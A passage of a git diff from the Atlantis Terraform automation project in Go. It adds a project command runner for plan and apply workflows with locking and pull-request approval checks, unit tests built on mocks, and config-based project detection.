+ When(workingDir.GetWorkingDir(baseRepo, pull, c.Cmd.Workspace)).ThenReturn(tmpDir, nil)
+ }
+ if c.AtlantisYAML != "" {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, yaml.AtlantisYAMLFilename), []byte(c.AtlantisYAML), 0600)
+ Ok(t, err)
+ }
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "main.tf"), nil, 0600)
+ Ok(t, err)
+
+ vcsClient := vcsmocks.NewMockClientProxy()
+ When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
+
+ builder := &events.DefaultProjectCommandBuilder{
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ WorkingDir: workingDir,
+ ParserValidator: &yaml.ParserValidator{},
+ VCSClient: vcsClient,
+ ProjectFinder: &events.DefaultProjectFinder{},
+ AllowRepoConfig: true,
+ }
+
+ cmdCtx := &events.CommandContext{
+ BaseRepo: baseRepo,
+ HeadRepo: headRepo,
+ Pull: pull,
+ User: models.User{},
+ Log: logger,
+ }
+ var actCtx models.ProjectCommandContext
+
+ if cmdName == events.Plan {
+ actCtx, err = builder.BuildPlanCommand(cmdCtx, &c.Cmd)
+ } else {
+ actCtx, err = builder.BuildApplyCommand(cmdCtx, &c.Cmd)
+ }
+
+ if c.ExpErr != "" {
+ ErrEquals(t, c.ExpErr, err)
+ return
+ }
+
+ Ok(t, err)
+ Equals(t, baseRepo, actCtx.BaseRepo)
+ Equals(t, baseRepo, actCtx.HeadRepo)
+ Equals(t, pull, actCtx.Pull)
+ Equals(t, models.User{}, actCtx.User)
+ Equals(t, logger, actCtx.Log)
+
+ Equals(t, c.ExpProjectConfig, actCtx.ProjectConfig)
+ Equals(t, c.ExpDir, actCtx.RepoRelDir)
+ Equals(t, c.ExpWorkspace, actCtx.Workspace)
+ Equals(t, c.ExpCommentArgs, actCtx.CommentArgs)
+ })
+ }
+ }
+}
+
+func String(v string) *string { return &v }
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
new file mode 100644
index 0000000000..1da06d1ad0
--- /dev/null
+++ b/server/events/project_command_runner.go
@@ -0,0 +1,239 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "strings"
+
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/webhooks"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
+
+type LockURLGenerator interface {
+ GenerateLockURL(lockID string) string
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_step_runner.go StepRunner
+
+type StepRunner interface {
+ Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_webhooks_sender.go WebhooksSender
+
+type WebhooksSender interface {
+ Send(log *logging.SimpleLogger, res webhooks.ApplyResult) error
+}
+
+// PlanSuccess is the result of a successful plan.
+type PlanSuccess struct {
+ TerraformOutput string
+ LockURL string
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_runner.go ProjectCommandRunner
+
+type ProjectCommandRunner interface {
+ Plan(ctx models.ProjectCommandContext) ProjectCommandResult
+ Apply(ctx models.ProjectCommandContext) ProjectCommandResult
+}
+
+type DefaultProjectCommandRunner struct {
+ Locker ProjectLocker
+ LockURLGenerator LockURLGenerator
+ InitStepRunner StepRunner
+ PlanStepRunner StepRunner
+ ApplyStepRunner StepRunner
+ RunStepRunner StepRunner
+ PullApprovedChecker runtime.PullApprovedChecker
+ WorkingDir WorkingDir
+ Webhooks WebhooksSender
+ WorkingDirLocker WorkingDirLocker
+ RequireApprovalOverride bool
+}
+
+func (p *DefaultProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
+ // Acquire Atlantis lock for this repo/dir/workspace.
+ lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelDir))
+ if err != nil {
+ return ProjectCommandResult{
+ Error: errors.Wrap(err, "acquiring lock"),
+ }
+ }
+ if !lockAttempt.LockAcquired {
+ return ProjectCommandResult{Failure: lockAttempt.LockFailureReason}
+ }
+ ctx.Log.Debug("acquired lock for project")
+
+ // Acquire internal lock for the directory we're going to operate in.
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return ProjectCommandResult{Error: err}
+ }
+ defer unlockFn()
+
+ // Clone is idempotent so okay to run even if the repo was already cloned.
+ repoDir, cloneErr := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
+ if cloneErr != nil {
+ if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+ ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+ }
+ return ProjectCommandResult{Error: cloneErr}
+ }
+ projAbsPath := filepath.Join(repoDir, ctx.RepoRelDir)
+
+ // Use default stage unless another workflow is defined in config
+ stage := p.defaultPlanStage()
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+ ctx.Log.Debug("project configured to use workflow %q", *ctx.ProjectConfig.Workflow)
+ configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow)
+ if configuredStage != nil {
+ ctx.Log.Debug("project will use the configured stage for that workflow")
+ stage = *configuredStage
+ }
+ }
+ outputs, err := p.runSteps(stage.Steps, ctx, projAbsPath)
+ if err != nil {
+ if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+ ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
+ }
+ return ProjectCommandResult{Error: fmt.Errorf("%s\n%s", err, strings.Join(outputs, "\n"))}
+ }
+
+ return ProjectCommandResult{
+ PlanSuccess: &PlanSuccess{
+ LockURL: p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey),
+ TerraformOutput: strings.Join(outputs, "\n"),
+ },
+ }
+}
+
+func (p *DefaultProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
+ var outputs []string
+ for _, step := range steps {
+ var out string
+ var err error
+ switch step.StepName {
+ case "init":
+ out, err = p.InitStepRunner.Run(ctx, step.ExtraArgs, absPath)
+ case "plan":
+ out, err = p.PlanStepRunner.Run(ctx, step.ExtraArgs, absPath)
+ case "apply":
+ out, err = p.ApplyStepRunner.Run(ctx, step.ExtraArgs, absPath)
+ case "run":
+ out, err = p.RunStepRunner.Run(ctx, step.RunCommand, absPath)
+ }
+
+ if out != "" {
+ outputs = append(outputs, out)
+ }
+ if err != nil {
+ return outputs, err
+ }
+ }
+ return outputs, nil
+}
+
+func (p *DefaultProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult {
+ repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)
+ if err != nil {
+ if os.IsNotExist(err) {
+ return ProjectCommandResult{Error: errors.New("project has not been cloned–did you run plan?")}
+ }
+ return ProjectCommandResult{Error: err}
+ }
+ absPath := filepath.Join(repoDir, ctx.RepoRelDir)
+
+ var applyRequirements []string
+ if ctx.ProjectConfig != nil {
+ applyRequirements = ctx.ProjectConfig.ApplyRequirements
+ }
+ if p.RequireApprovalOverride {
+ applyRequirements = []string{raw.ApprovedApplyRequirement}
+ }
+ for _, req := range applyRequirements {
+ switch req {
+ case raw.ApprovedApplyRequirement:
+ approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow
+ if err != nil {
+ return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
+ }
+ if !approved {
+ return ProjectCommandResult{Failure: "Pull request must be approved before running apply."}
+ }
+ }
+ }
+ // Acquire internal lock for the directory we're going to operate in.
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return ProjectCommandResult{Error: err}
+ }
+ defer unlockFn()
+
+ // Use default stage unless another workflow is defined in config
+ stage := p.defaultApplyStage()
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+ configuredStage := ctx.GlobalConfig.GetApplyStage(*ctx.ProjectConfig.Workflow)
+ if configuredStage != nil {
+ stage = *configuredStage
+ }
+ }
+ outputs, err := p.runSteps(stage.Steps, ctx, absPath)
+ p.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck
+ Workspace: ctx.Workspace,
+ User: ctx.User,
+ Repo: ctx.BaseRepo,
+ Pull: ctx.Pull,
+ Success: err == nil,
+ })
+ if err != nil {
+ return ProjectCommandResult{Error: fmt.Errorf("%s\n%s", err, strings.Join(outputs, "\n"))}
+ }
+ return ProjectCommandResult{
+ ApplySuccess: strings.Join(outputs, "\n"),
+ }
+}
+
+func (p DefaultProjectCommandRunner) defaultPlanStage() valid.Stage {
+ return valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ {
+ StepName: "plan",
+ },
+ },
+ }
+}
+
+func (p DefaultProjectCommandRunner) defaultApplyStage() valid.Stage {
+ return valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "apply",
+ },
+ },
+ }
+}
diff --git a/server/events/project_command_runner_test.go b/server/events/project_command_runner_test.go
new file mode 100644
index 0000000000..85e2e2826b
--- /dev/null
+++ b/server/events/project_command_runner_test.go
@@ -0,0 +1,414 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "os"
+ "strings"
+ "testing"
+
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ mocks2 "github.com/runatlantis/atlantis/server/events/runtime/mocks"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectCommandRunner_Plan(t *testing.T) {
+ cases := []struct {
+ description string
+ projCfg *valid.Project
+ globalCfg *valid.Config
+ expSteps []string
+ expOut string
+ }{
+ {
+ description: "use defaults",
+ projCfg: nil,
+ globalCfg: nil,
+ expSteps: []string{"init", "plan"},
+ expOut: "init\nplan",
+ },
+ {
+ description: "no workflow, use defaults",
+ projCfg: &valid.Project{
+ Dir: ".",
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ },
+ expSteps: []string{"init", "plan"},
+ expOut: "init\nplan",
+ },
+ {
+ description: "workflow without plan stage set",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Apply: &valid.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ },
+ expSteps: []string{"init", "plan"},
+ expOut: "init\nplan",
+ },
+ {
+ description: "workflow with custom plan stage",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ },
+ {
+ StepName: "apply",
+ },
+ {
+ StepName: "plan",
+ },
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ },
+ expSteps: []string{"run", "apply", "plan", "init"},
+ expOut: "run\napply\nplan\ninit",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(strings.Join(c.expSteps, ","), func(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockInit := mocks.NewMockStepRunner()
+ mockPlan := mocks.NewMockStepRunner()
+ mockApply := mocks.NewMockStepRunner()
+ mockRun := mocks.NewMockStepRunner()
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ mockLocker := mocks.NewMockProjectLocker()
+
+ runner := events.DefaultProjectCommandRunner{
+ Locker: mockLocker,
+ LockURLGenerator: mockURLGenerator{},
+ InitStepRunner: mockInit,
+ PlanStepRunner: mockPlan,
+ ApplyStepRunner: mockApply,
+ RunStepRunner: mockRun,
+ PullApprovedChecker: nil,
+ WorkingDir: mockWorkingDir,
+ Webhooks: nil,
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ }
+
+ repoDir := "/tmp/mydir"
+ When(mockWorkingDir.Clone(
+ matchers.AnyPtrToLoggingSimpleLogger(),
+ matchers.AnyModelsRepo(),
+ matchers.AnyModelsRepo(),
+ matchers.AnyModelsPullRequest(),
+ AnyString(),
+ )).ThenReturn(repoDir, nil)
+ When(mockLocker.TryLock(
+ matchers.AnyPtrToLoggingSimpleLogger(),
+ matchers.AnyModelsPullRequest(),
+ matchers.AnyModelsUser(),
+ AnyString(),
+ matchers.AnyModelsProject(),
+ )).ThenReturn(&events.TryLockResponse{
+ LockAcquired: true,
+ LockKey: "lock-key",
+ }, nil)
+
+ ctx := models.ProjectCommandContext{
+ Log: logging.NewNoopLogger(),
+ ProjectConfig: c.projCfg,
+ Workspace: "default",
+ GlobalConfig: c.globalCfg,
+ RepoRelDir: ".",
+ }
+ When(mockInit.Run(ctx, nil, repoDir)).ThenReturn("init", nil)
+ When(mockPlan.Run(ctx, nil, repoDir)).ThenReturn("plan", nil)
+ When(mockApply.Run(ctx, nil, repoDir)).ThenReturn("apply", nil)
+ When(mockRun.Run(ctx, nil, repoDir)).ThenReturn("run", nil)
+
+ res := runner.Plan(ctx)
+
+ Assert(t, res.PlanSuccess != nil, "exp plan success")
+ Equals(t, "https://lock-key", res.PlanSuccess.LockURL)
+ Equals(t, c.expOut, res.PlanSuccess.TerraformOutput)
+
+ for _, step := range c.expSteps {
+ switch step {
+ case "init":
+ mockInit.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "plan":
+ mockPlan.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "apply":
+ mockApply.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "run":
+ mockRun.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ }
+ }
+ })
+ }
+}
+
+func TestDefaultProjectCommandRunner_ApplyNotCloned(t *testing.T) {
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ runner := &events.DefaultProjectCommandRunner{
+ WorkingDir: mockWorkingDir,
+ }
+ ctx := models.ProjectCommandContext{}
+ When(mockWorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)).ThenReturn("", os.ErrNotExist)
+
+ res := runner.Apply(ctx)
+ ErrEquals(t, "project has not been cloned–did you run plan?", res.Error)
+}
+
+func TestDefaultProjectCommandRunner_ApplyNotApproved(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ mockApproved := mocks2.NewMockPullApprovedChecker()
+ runner := &events.DefaultProjectCommandRunner{
+ WorkingDir: mockWorkingDir,
+ PullApprovedChecker: mockApproved,
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ RequireApprovalOverride: true,
+ }
+ ctx := models.ProjectCommandContext{}
+ When(mockWorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)).ThenReturn("/tmp/mydir", nil)
+ When(mockApproved.PullIsApproved(ctx.BaseRepo, ctx.Pull)).ThenReturn(false, nil)
+
+ res := runner.Apply(ctx)
+ Equals(t, "Pull request must be approved before running apply.", res.Failure)
+}
+
+func TestDefaultProjectCommandRunner_Apply(t *testing.T) {
+ cases := []struct {
+ description string
+ projCfg *valid.Project
+ globalCfg *valid.Config
+ expSteps []string
+ expOut string
+ }{
+ {
+ description: "use defaults",
+ projCfg: nil,
+ globalCfg: nil,
+ expSteps: []string{"apply"},
+ expOut: "apply",
+ },
+ {
+ description: "no workflow, use defaults",
+ projCfg: &valid.Project{
+ Dir: ".",
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ },
+ expSteps: []string{"apply"},
+ expOut: "apply",
+ },
+ {
+ description: "no workflow, approval required, use defaults",
+ projCfg: &valid.Project{
+ Dir: ".",
+ ApplyRequirements: []string{"approved"},
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ ApplyRequirements: []string{"approved"},
+ },
+ },
+ },
+ expSteps: []string{"approved", "apply"},
+ expOut: "apply",
+ },
+ {
+ description: "workflow without apply stage set",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Plan: &valid.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ },
+ expSteps: []string{"apply"},
+ expOut: "apply",
+ },
+ {
+ description: "workflow with custom apply stage",
+ projCfg: &valid.Project{
+ Dir: ".",
+ Workflow: String("myworkflow"),
+ },
+ globalCfg: &valid.Config{
+ Version: 2,
+ Projects: []valid.Project{
+ {
+ Dir: ".",
+ },
+ },
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "run",
+ },
+ {
+ StepName: "apply",
+ },
+ {
+ StepName: "plan",
+ },
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ },
+ expSteps: []string{"run", "apply", "plan", "init"},
+ expOut: "run\napply\nplan\ninit",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(strings.Join(c.expSteps, ","), func(t *testing.T) {
+ RegisterMockTestingT(t)
+ mockInit := mocks.NewMockStepRunner()
+ mockPlan := mocks.NewMockStepRunner()
+ mockApply := mocks.NewMockStepRunner()
+ mockRun := mocks.NewMockStepRunner()
+ mockApproved := mocks2.NewMockPullApprovedChecker()
+ mockWorkingDir := mocks.NewMockWorkingDir()
+ mockLocker := mocks.NewMockProjectLocker()
+ mockSender := mocks.NewMockWebhooksSender()
+
+ runner := events.DefaultProjectCommandRunner{
+ Locker: mockLocker,
+ LockURLGenerator: mockURLGenerator{},
+ InitStepRunner: mockInit,
+ PlanStepRunner: mockPlan,
+ ApplyStepRunner: mockApply,
+ RunStepRunner: mockRun,
+ PullApprovedChecker: mockApproved,
+ WorkingDir: mockWorkingDir,
+ Webhooks: mockSender,
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ }
+
+ repoDir := "/tmp/mydir"
+ When(mockWorkingDir.GetWorkingDir(
+ matchers.AnyModelsRepo(),
+ matchers.AnyModelsPullRequest(),
+ AnyString(),
+ )).ThenReturn(repoDir, nil)
+
+ ctx := models.ProjectCommandContext{
+ Log: logging.NewNoopLogger(),
+ ProjectConfig: c.projCfg,
+ Workspace: "default",
+ GlobalConfig: c.globalCfg,
+ RepoRelDir: ".",
+ }
+ When(mockInit.Run(ctx, nil, repoDir)).ThenReturn("init", nil)
+ When(mockPlan.Run(ctx, nil, repoDir)).ThenReturn("plan", nil)
+ When(mockApply.Run(ctx, nil, repoDir)).ThenReturn("apply", nil)
+ When(mockRun.Run(ctx, nil, repoDir)).ThenReturn("run", nil)
+ When(mockApproved.PullIsApproved(ctx.BaseRepo, ctx.Pull)).ThenReturn(true, nil)
+
+ res := runner.Apply(ctx)
+ Equals(t, c.expOut, res.ApplySuccess)
+
+ for _, step := range c.expSteps {
+ switch step {
+ case "approved":
+ mockApproved.VerifyWasCalledOnce().PullIsApproved(ctx.BaseRepo, ctx.Pull)
+ case "init":
+ mockInit.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "plan":
+ mockPlan.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "apply":
+ mockApply.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ case "run":
+ mockRun.VerifyWasCalledOnce().Run(ctx, nil, repoDir)
+ }
+ }
+ })
+ }
+}
+
+type mockURLGenerator struct{}
+
+func (m mockURLGenerator) GenerateLockURL(lockID string) string {
+ return "https://" + lockID
+}
diff --git a/server/events/project_finder.go b/server/events/project_finder.go
index e14c3b7e72..07dfcd6c64 100644
--- a/server/events/project_finder.go
+++ b/server/events/project_finder.go
@@ -19,7 +19,10 @@ import (
"path/filepath"
"strings"
+ "github.com/docker/docker/pkg/fileutils"
+ "github.com/pkg/errors"
"github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
"github.com/runatlantis/atlantis/server/logging"
)
@@ -30,6 +33,7 @@ type ProjectFinder interface {
// DetermineProjects returns the list of projects that were modified based on
// the modifiedFiles. The list will be de-duplicated.
DetermineProjects(log *logging.SimpleLogger, modifiedFiles []string, repoFullName string, repoDir string) []models.Project
+ DetermineProjectsViaConfig(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config, repoDir string) ([]valid.Project, error)
}
// DefaultProjectFinder implements ProjectFinder.
@@ -49,22 +53,72 @@ func (p *DefaultProjectFinder) DetermineProjects(log *logging.SimpleLogger, modi
log.Info("filtered modified files to %d .tf files: %v",
len(modifiedTerraformFiles), modifiedTerraformFiles)
- var paths []string
+ var dirs []string
for _, modifiedFile := range modifiedTerraformFiles {
- projectPath := p.getProjectPath(modifiedFile, repoDir)
- if projectPath != "" {
- paths = append(paths, projectPath)
+ projectDir := p.getProjectDir(modifiedFile, repoDir)
+ if projectDir != "" {
+ dirs = append(dirs, projectDir)
}
}
- uniquePaths := p.unique(paths)
- for _, uniquePath := range uniquePaths {
- projects = append(projects, models.NewProject(repoFullName, uniquePath))
+ uniqueDirs := p.unique(dirs)
+
+ // The list of modified files will include files that were deleted. We still
+ // want to run plan if a file was deleted since that often results in a
+ // change however we want to remove directories that have been completely
+ // deleted.
+ exists := p.filterToDirExists(uniqueDirs, repoDir)
+
+ for _, p := range exists {
+ projects = append(projects, models.NewProject(repoFullName, p))
}
log.Info("there are %d modified project(s) at path(s): %v",
- len(projects), strings.Join(uniquePaths, ", "))
+ len(projects), strings.Join(exists, ", "))
return projects
}
+func (p *DefaultProjectFinder) DetermineProjectsViaConfig(log *logging.SimpleLogger, modifiedFiles []string, config valid.Config, repoDir string) ([]valid.Project, error) {
+ var projects []valid.Project
+ for _, project := range config.Projects {
+ log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
+ if !project.Autoplan.Enabled {
+ log.Debug("autoplan disabled, ignoring")
+ continue
+ }
+ // Prepend project dir to when modified patterns because the patterns
+ // are relative to the project dirs but our list of modified files is
+ // relative to the repo root.
+ var whenModifiedRelToRepoRoot []string
+ for _, wm := range project.Autoplan.WhenModified {
+ whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm))
+ }
+ pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot)
+ if err != nil {
+ return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified)
+ }
+
+ // If any of the modified files matches the pattern then this project is
+ // considered modified.
+ for _, file := range modifiedFiles {
+ match, err := pm.Matches(file)
+ if err != nil {
+ log.Debug("match err for file %q: %s", file, err)
+ continue
+ }
+ if match {
+ log.Debug("file %q matched pattern", file)
+ _, err := os.Stat(filepath.Join(repoDir, project.Dir))
+ if err == nil {
+ projects = append(projects, project)
+ } else {
+ log.Debug("project at dir %q not included because dir does not exist", project.Dir)
+ }
+ break
+ }
+ }
+ }
+ return projects, nil
+}
+
func (p *DefaultProjectFinder) filterToTerraform(files []string) []string {
var filtered []string
for _, fileName := range files {
@@ -84,12 +138,12 @@ func (p *DefaultProjectFinder) isInExcludeList(fileName string) bool {
return false
}
-// getProjectPath attempts to determine based on the location of a modified
+// getProjectDir attempts to determine based on the location of a modified
// file, where the root of the Terraform project is. It also attempts to verify
// if the root is valid by looking for a main.tf file. It returns a relative
-// path. If the project is at the root returns ".". If modified file doesn't
-// lead to a valid project path, returns an empty string.
-func (p *DefaultProjectFinder) getProjectPath(modifiedFilePath string, repoDir string) string {
+// path to the repo. If the project is at the root returns ".". If modified file
+// doesn't lead to a valid project path, returns an empty string.
+func (p *DefaultProjectFinder) getProjectDir(modifiedFilePath string, repoDir string) string {
dir := path.Dir(modifiedFilePath)
if path.Base(dir) == "env" {
// If the modified file was inside an env/ directory, we treat this
@@ -159,3 +213,14 @@ func (p *DefaultProjectFinder) unique(strs []string) []string {
}
return unique
}
+
+func (p *DefaultProjectFinder) filterToDirExists(relativePaths []string, repoDir string) []string {
+ var filtered []string
+ for _, pth := range relativePaths {
+ absPath := filepath.Join(repoDir, pth)
+ if _, err := os.Stat(absPath); !os.IsNotExist(err) {
+ filtered = append(filtered, pth)
+ }
+ }
+ return filtered
+}
diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go
index dd9af7792f..df84fd0945 100644
--- a/server/events/project_finder_test.go
+++ b/server/events/project_finder_test.go
@@ -20,6 +20,7 @@ import (
"testing"
"github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
"github.com/runatlantis/atlantis/server/logging"
. "github.com/runatlantis/atlantis/testing"
)
@@ -30,13 +31,19 @@ var m = events.DefaultProjectFinder{}
var nestedModules1 string
var nestedModules2 string
var topLevelModules string
+var envDir string
func setupTmpRepos(t *testing.T) {
// Create different repo structures for testing.
// 1. Nested modules directory inside a project
+ // non-tf
+ // terraform.tfstate
+ // terraform.tfstate.backup
// project1/
// main.tf
+ // terraform.tfstate
+ // terraform.tfstate.backup
// modules/
// main.tf
var err error
@@ -44,10 +51,18 @@ func setupTmpRepos(t *testing.T) {
Ok(t, err)
err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700)
Ok(t, err)
- _, err = os.Create(filepath.Join(nestedModules1, "project1/main.tf"))
- Ok(t, err)
- _, err = os.Create(filepath.Join(nestedModules1, "project1/modules/main.tf"))
- Ok(t, err)
+ files := []string{
+ "non-tf",
+ "terraform.tfstate.backup",
+ "project1/main.tf",
+ "project1/terraform.tfstate",
+ "project1/terraform.tfstate.backup",
+ "project1/modules/main.tf",
+ }
+ for _, f := range files {
+ _, err = os.Create(filepath.Join(nestedModules1, f))
+ Ok(t, err)
+ }
// 2. Nested modules dir inside top-level project
// main.tf
@@ -71,6 +86,20 @@ func setupTmpRepos(t *testing.T) {
_, err = os.Create(filepath.Join(topLevelModules, path, "main.tf"))
Ok(t, err)
}
+
+ // 4. Env/ dir
+ // main.tf
+ // env/
+ // staging.tfvars
+ // production.tfvars
+ envDir, err = ioutil.TempDir("", "")
+ Ok(t, err)
+ err = os.MkdirAll(filepath.Join(envDir, "env"), 0700)
+ Ok(t, err)
+ _, err = os.Create(filepath.Join(envDir, "env/staging.tfvars"))
+ Ok(t, err)
+ _, err = os.Create(filepath.Join(envDir, "env/production.tfvars"))
+ Ok(t, err)
}
func TestDetermineProjects(t *testing.T) {
@@ -86,13 +115,13 @@ func TestDetermineProjects(t *testing.T) {
"If no files were modified then should return an empty list",
nil,
nil,
- "",
+ nestedModules1,
},
{
"Should ignore non .tf files and return an empty list",
[]string{"non-tf"},
nil,
- "",
+ nestedModules1,
},
{
"Should plan in the parent directory from modules if that dir has a main.tf",
@@ -128,65 +157,225 @@ func TestDetermineProjects(t *testing.T) {
"Should ignore tfstate files and return an empty list",
[]string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"},
nil,
- "",
- },
- {
- "Should ignore tfstate files and return an empty list",
- []string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"},
- nil,
- "",
+ nestedModules1,
},
{
"Should return '.' when changed file is at root",
[]string{"a.tf"},
[]string{"."},
- "",
+ nestedModules2,
},
{
"Should return directory when changed file is in a dir",
- []string{"parent/a.tf"},
- []string{"parent"},
- "",
+ []string{"project1/a.tf"},
+ []string{"project1"},
+ nestedModules1,
},
{
"Should return parent dir when changed file is in an env/ dir",
